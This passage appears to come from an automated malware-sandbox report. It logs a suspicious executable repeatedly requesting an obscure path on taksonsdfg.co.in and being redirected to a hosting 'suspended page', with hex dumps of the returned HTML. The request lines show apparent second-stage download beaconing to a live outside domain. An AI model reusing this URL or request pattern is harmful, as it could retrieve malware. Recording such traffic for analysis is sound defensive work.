2024-11-26 07:12:50 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49825	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:52 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:52 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:12:52 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:52 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:12:52 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:12:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49832	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:54 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:55 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:12:55 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:55 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49838	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:56 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:57 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:12:57 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:57 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:12:57 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:12:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49845	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:59 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:59 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:12:59 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:59 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49850	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:00 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:01 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:13:01 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:01 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:13:01 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:13:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49858	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:03 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:04 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:13:04 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:04 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49862	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:05 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:06 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:13:06 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:06 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:13:06 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:13:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49870	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:07 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:08 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:13:08 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:08 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49876	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:10 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:10 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:13:10 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:10 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:13:10 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 